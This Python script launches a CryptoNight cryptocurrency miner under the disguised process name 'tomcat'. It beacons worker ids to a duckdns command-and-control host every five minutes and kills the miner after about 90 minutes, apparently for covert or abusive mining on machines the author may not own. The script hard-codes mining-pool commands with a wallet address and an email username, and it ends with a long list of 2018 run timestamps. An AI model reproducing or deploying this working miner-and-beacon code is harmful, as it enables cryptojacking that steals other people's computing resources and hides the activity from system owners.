import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:34:05.031326
#2018-02-17 16:20:08.250413
#2018-02-17 18:08:03.984740
#2018-02-17 19:55:05.512531
#2018-02-17 21:42:04.084382
#2018-02-17 23:25:08.602601
#2018-02-18 01:14:03.972151
#2018-02-18 03:02:07.347689
#2018-02-18 04:49:05.808171
#2018-02-18 06:40:07.539051
#2018-02-18 08:29:07.624801
#2018-02-18 10:16:07.597012
#2018-02-18 12:02:07.718462
#2018-02-18 13:47:07.157990
#2018-02-18 15:39:08.099402
#2018-02-18 17:29:04.607488
#2018-02-18 19:17:03.905158
#2018-02-18 21:03:06.939719
#2018-02-18 22:49:04.434670
#2018-02-19 00:38:01.333890
#2018-02-19 02:24:05.645496
#2018-02-19 04:11:05.500428
#2018-02-19 05:55:03.102807
#2018-02-19 07:44:02.018873
#2018-02-19 09:34:05.064716
#2018-02-19 11:24:06.890110
#2018-02-19 13:11:08.171477
#2018-02-19 14:58:08.591999
#2018-02-19 16:48:01.727779
#2018-02-19 18:33:08.712611
#2018-02-19 20:18:06.971175
#2018-02-19 22:07:05.762397
#2018-02-19 23:52:04.024168
#2018-02-20 01:39:01.957416
#2018-02-20 03:27:04.163132
#2018-02-20 05:13:06.377224
#2018-02-20 06:57:06.453385
#2018-02-20 08:44:02.035924
#2018-02-20 10:28:04.724866
#2018-02-20 12:12:07.825856
#2018-02-20 14:01:09.631281
#2018-02-20 15:46:01.446440
#2018-02-20 17:32:07.101898
#2018-02-20 19:19:06.154097
#2018-02-20 21:07:07.758608
#2018-02-20 22:52:07.399727
#2018-02-21 00:36:04.381114
#2018-02-21 02:22:05.424469
#2018-02-21 04:09:07.452253
#2018-02-21 05:56:07.532190
#2018-02-21 07:44:07.078723
#2018-02-21 09:33:04.400830
#2018-02-21 11:21:05.606833
#2018-02-21 13:09:07.464917
#2018-02-21 14:56:08.587535
#2018-02-21 16:44:09.769950
#2018-02-21 18:35:08.078902
#2018-02-21 20:20:07.192239
#2018-02-21 22:07:06.865501
#2018-02-21 23:57:01.592439
#2018-02-22 01:44:07.998453
#2018-02-22 03:32:08.174437
#2018-02-22 05:19:07.276812
#2018-02-22 07:04:05.076846
#2018-02-22 08:51:05.930025
#2018-02-22 10:39:01.500572
#2018-02-22 12:25:10.827330
#2018-02-22 14:10:11.264010
#2018-02-22 15:56:08.127977
#2018-02-22 17:42:05.401326
#2018-02-22 19:28:02.156786
#2018-02-22 21:20:01.435730
#2018-02-22 23:05:04.167353
#2018-02-23 00:51:01.416475
#2018-02-23 02:38:05.209173
#2018-02-23 04:26:06.094729
#2018-02-23 06:12:07.643822
#2018-02-23 08:01:05.328757
#2018-02-23 10:09:08.182154
#2018-02-23 12:02:04.387772
#2018-02-23 13:50:08.360697
#2018-02-23 15:39:08.397355
#2018-02-23 17:27:01.913161
#2018-02-23 19:14:05.420905
#2018-02-23 20:58:01.679407
#2018-02-23 22:44:06.511166
#2018-02-24 00:31:07.713951
#2018-02-24 02:22:08.477550
#2018-02-24 04:11:04.205044
#2018-02-24 05:59:01.251785
#2018-02-24 07:47:01.942255
#2018-02-24 09:31:06.541377
#2018-02-24 11:26:05.452252
#2018-02-24 13:15:06.469489
#2018-02-24 15:06:03.984279
#2018-02-24 16:54:04.798494
#2018-02-24 18:42:06.597098
#2018-02-24 20:33:04.615597
#2018-02-24 22:34:04.050640
#2018-02-25 01:42:07.079945
#2018-02-25 05:14:06.118179
#2018-02-25 11:11:01.428795